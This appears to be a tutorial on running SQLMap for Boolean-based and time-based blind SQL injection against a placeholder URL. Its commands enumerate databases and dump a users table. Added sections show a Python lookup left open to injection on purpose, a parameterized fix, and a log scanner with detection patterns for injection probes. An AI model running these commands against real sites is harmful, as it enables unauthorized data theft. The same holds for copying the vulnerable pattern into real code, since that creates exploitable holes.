SQLMap

SQLMap is an open-source tool for automating the detection and exploitation of SQL injection vulnerabilities in web applications, including Blind SQL Injection. It provides various commands to identify targets, enumerate databases, and extract data using Boolean and Time-based techniques. Users can customize their scans with options for risk levels, testing levels, and batch processing to enhance the effectiveness of their SQL injection testing.

Uploaded by

sameerbhatti8162

SQLMap is a powerful and popular open-source tool for automating the process of detecting
and exploiting SQL injection vulnerabilities in web applications. It supports various types of SQL
injection, including Blind SQL Injection. Below, I’ll explain how to use SQLMap for both
Boolean-based and Time-based Blind SQL Injection.

Setting Up SQLMap
Installation: SQLMap is typically pre-installed on Kali Linux. If you need to install it, you can
clone it from GitHub:
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
Usage: SQLMap can be run directly from the command line within its directory using the
following syntax:
python sqlmap.py [options]

General Steps for Using SQLMap

1. Identify Target: Determine the target URL that is vulnerable to SQL injection.
   ○ For example: http://example.com/products?id=1

2. Basic Command Structure: The basic command to test a URL for SQL injection vulnerabilities
is:
python sqlmap.py -u "http://example.com/products?id=1"

   ○ -u: Specifies the target URL.

Using SQLMap for Blind SQL Injection

1. Boolean-based Blind SQL Injection

To test for Boolean-based Blind SQLi, you can simply run the following command:

python sqlmap.py -u "http://example.com/products?id=1" --dbs

● --dbs: This option tells SQLMap to enumerate the databases if a SQL injection
vulnerability is found.

SQLMap will automatically perform various Boolean tests to determine if the URL is vulnerable.
If it is, SQLMap will provide information about the databases available.
Example:

If you find a vulnerable endpoint, you can try to extract specific database names:

python sqlmap.py -u "http://example.com/products?id=1" --dbs

SQLMap will return a list of databases it has discovered.
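
Why Boolean tests reveal the flaw, shown as an added example that is not part of the original document: a deliberately vulnerable lookup for the products?id= parameter beside a parameterized one. The SQLite table, the handler names and the response strings are assumptions made for the illustration.

```python
import sqlite3


def make_db():
    # Constructed sample data for this example
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    db.execute("INSERT INTO products VALUES (1, 'widget')")
    return db


def product_page_vulnerable(db, raw_id):
    # Deliberately vulnerable: the parameter becomes part of the SQL text,
    # so a condition appended to it is evaluated by the database.
    row = db.execute("SELECT name FROM products WHERE id = " + raw_id).fetchone()
    return "200 product found" if row else "404 no such product"


def product_page_parameterized(db, raw_id):
    # Hardened: validate the type, then bind the value as a parameter.
    try:
        product_id = int(raw_id)
    except ValueError:
        return "400 bad request"
    row = db.execute(
        "SELECT name FROM products WHERE id = ?", (product_id,)
    ).fetchone()
    return "200 product found" if row else "404 no such product"


def leaks_boolean_oracle(handler, db):
    # A true condition and a false condition should not change the page.
    # If they do, the response acts as a true/false oracle for the database.
    true_response = handler(db, "1 AND 1=1")
    false_response = handler(db, "1 AND 1=2")
    return true_response != false_response


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler leaks:", leaks_boolean_oracle(product_page_vulnerable, db))
    print("parameterized handler leaks:", leaks_boolean_oracle(product_page_parameterized, db))
```

The same true/false comparison works as a regression check after a fix: the hardened handler must answer both inputs identically.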

2. Time-based Blind SQL Injection

If you want to force SQLMap to use time-based techniques, you can use the --time-sec
option to specify a delay:

python sqlmap.py -u "http://example.com/products?id=1" --time-sec=5 --dbs

● --time-sec=5: This option tells SQLMap to use a 5-second delay to identify
vulnerabilities using time-based attacks.

SQLMap will attempt to exploit time delays to infer information about the database.
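
From the defender's side, the Boolean and time-based tests described above leave recognizable traces in web server logs. This added example (not from the original document) scans constructed access-log lines; the log format with a trailing request time, the patterns and the function name scan are assumptions, and the patterns are illustrative rather than a complete signature set.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines: combined log format plus request time in seconds
SAMPLE_LOG = '''\
203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET /products?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0" 0.012
203.0.113.9 - - [10/Oct/2024:13:56:01 +0000] "GET /products?id=1%20AND%204821%3D4821 HTTP/1.1" 200 512 "-" "sqlmap/1.x (https://sqlmap.org)" 0.015
203.0.113.9 - - [10/Oct/2024:13:56:09 +0000] "GET /products?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0" 5.020
198.51.100.4 - - [10/Oct/2024:13:57:00 +0000] "GET /products?id=2 HTTP/1.1" 200 498 "-" "Mozilla/5.0" 5.300
'''

LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)" ([\d.]+)$'
)
# Database delay functions that have no place in a product id
DELAY_RE = re.compile(r'\b(sleep|pg_sleep|benchmark)\s*\(|waitfor\s+delay', re.I)
# Numeric comparisons appended to a parameter, e.g. "AND 4821=4821"
BOOL_RE = re.compile(r'\b(and|or)\s+\d+\s*=\s*\d+', re.I)


def scan(log_text, time_sec=5.0):
    """Return (client_ip, reasons) for each log line that looks like an SQLi test."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, _method, target, _status, agent, elapsed = m.groups()
        query = unquote_plus(target.partition("?")[2])
        reasons = []
        # The User-Agent is client-controlled, so it is a weak signal by itself
        if "sqlmap" in agent.lower():
            reasons.append("sqlmap-user-agent")
        if BOOL_RE.search(query):
            reasons.append("boolean-test")
        if DELAY_RE.search(query):
            reasons.append("delay-function")
            # A slow response only counts when the request asked for a delay
            if float(elapsed) >= time_sec:
                reasons.append("delayed-response")
        if reasons:
            findings.append((ip, reasons))
    return findings


if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG):
        print(ip, ", ".join(reasons))
```

The last sample line is slow but carries no injected condition, so it is not flagged; a delay-function hit that also shows a delayed response suggests the injected delay actually executed on the database.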

Extracting Data with SQLMap

Once you've identified the databases and tables, you can extract information.

1. Listing Tables

To list tables in a specific database (e.g., users_db):

python sqlmap.py -u "http://example.com/products?id=1" -D users_db --tables

● -D: Specifies the database name.
● --tables: Lists all tables in the specified database.

2. Dumping Data

To dump data from a specific table (e.g., users):

python sqlmap.py -u "http://example.com/products?id=1" -D users_db -T users --dump

● -T: Specifies the table name.
● --dump: Dumps the contents of the specified table.

Additional Options

● --risk: Set the risk level (default is 1, maximum is 3). Higher risk levels may test more
advanced injection techniques.
● --level: Set the level of tests (default is 1, maximum is 5). Higher levels may test for
more types of injections.
● --batch: Run in batch mode, which automates the process without user intervention.

Example Command with Options

Here’s an example command that combines several options:

python sqlmap.py -u "http://example.com/products?id=1" --dbs --level=3 --risk=3 --batch

This command attempts to discover databases with a higher risk and level while running in
batch mode.

Summary

SQLMap is a robust tool that simplifies the process of detecting and exploiting SQL injection
vulnerabilities, including Blind SQL Injection. By using different options and methods, you can
effectively gather information from vulnerable web applications, even when direct feedback is
not available.

● Boolean-based Blind SQLi: You can use SQLMap's automatic detection to infer data
based on true/false conditions.
● Time-based Blind SQLi: You can force SQLMap to use timing attacks to gather data
based on response times.
